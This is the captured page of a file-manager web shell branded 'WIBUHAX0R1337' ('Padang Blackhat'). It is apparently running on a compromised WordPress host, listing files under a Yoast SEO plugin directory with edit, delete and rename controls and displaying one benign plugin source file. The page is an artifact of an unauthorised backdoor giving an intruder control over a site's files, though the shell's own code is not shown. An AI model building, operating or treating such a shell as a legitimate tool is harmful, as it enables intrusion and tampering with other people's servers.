-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
www
/
wp-content
/
plugins
/
wordpress-seo
/
inc
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
exceptions
--
NONE
options
--
NONE
sitemaps
--
NONE
.htaccess
0.231KB
Edit File
Delete File
Rename
class-my-yoast-api-request.php
4.775KB
Edit File
Delete File
Rename
class-post-type.php
2.767KB
Edit File
Delete File
Rename
class-wpseo-admin-bar-menu.php
19.016KB
Edit File
Delete File
Rename
class-wpseo-content-images.php
2.552KB
Edit File
Delete File
Rename
class-wpseo-custom-fields.php
1.45KB
Edit File
Delete File
Rename
class-wpseo-custom-taxonomies.php
1.59KB
Edit File
Delete File
Rename
class-wpseo-image-utils.php
13.652KB
Edit File
Delete File
Rename
class-wpseo-installation.php
1.092KB
Edit File
Delete File
Rename
class-wpseo-primary-term.php
1.63KB
Edit File
Delete File
Rename
class-wpseo-replace-vars.php
50.236KB
Edit File
Delete File
Rename
class-wpseo-replacement-variable.php
1.343KB
Edit File
Delete File
Rename
health-check-curl-version.php
4.477KB
Edit File
Delete File
Rename
health-check-links-table-not-accessible.php
2.258KB
Edit File
Delete File
Rename
health-check-page-comments.php
1.692KB
Edit File
Delete File
Rename
health-check-postname-permalink.php
1.733KB
Edit File
Delete File
Rename
interface-wpseo-wordpress-ajax-integration.php
0.287KB
Edit File
Delete File
Rename
interface-wpseo-wordpress-integration.php
0.34KB
Edit File
Delete File
Rename
wpseo-non-ajax-functions.php
1.556KB
Edit File
Delete File
Rename
<?php /** * WPSEO plugin file. * * @package WPSEO\Internals */ /** * Represents the health check for paginated comments. */ class WPSEO_Health_Check_Page_Comments extends WPSEO_Health_Check { /** * The name of the test. * * @var string */ protected $test = 'yoast-health-check-page-comments'; /** * Runs the test. */ public function run() { if ( ! $this->has_page_comments() ) { $this->label = esc_html__( 'Comments are displayed on a single page', 'wordpress-seo' ); $this->status = self::STATUS_GOOD; $this->badge['color'] = 'blue'; $this->description = esc_html__( 'Comments on your posts are displayed on a single page. This is just like we\'d suggest it. You\'re doing well!', 'wordpress-seo' ); return; } $this->label = esc_html__( 'Comments break into multiple pages', 'wordpress-seo' ); $this->status = self::STATUS_RECOMMENDED; $this->badge['color'] = 'red'; $this->description = esc_html__( 'Comments on your posts break into multiple pages. As this is not needed in 999 out of 1000 cases, we recommend you disable it. To fix this, uncheck "Break comments into pages..." on the Discussion Settings page.', 'wordpress-seo' ); $this->actions = sprintf( /* translators: 1: Opening tag of the link to the discussion settings page, 2: Link closing tag. */ esc_html__( '%1$sGo to the Discussion Settings page%2$s', 'wordpress-seo' ), '<a href="' . esc_url( admin_url( 'options-discussion.php' ) ) . '">', '</a>' ); } /** * Are page comments enabled. * * @return bool True when page comments are enabled. */ protected function has_page_comments() { return get_option( 'page_comments' ) === '1'; } }
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat